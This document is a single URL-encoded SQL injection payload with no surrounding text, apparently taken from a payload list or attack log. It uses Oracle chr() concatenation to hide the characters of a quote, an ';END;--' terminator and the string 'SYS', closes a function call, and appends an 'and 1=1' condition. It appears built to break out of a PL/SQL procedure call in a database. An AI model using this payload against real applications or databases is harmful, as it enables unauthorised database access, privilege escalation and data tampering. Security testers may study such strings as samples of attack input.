chr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1

 

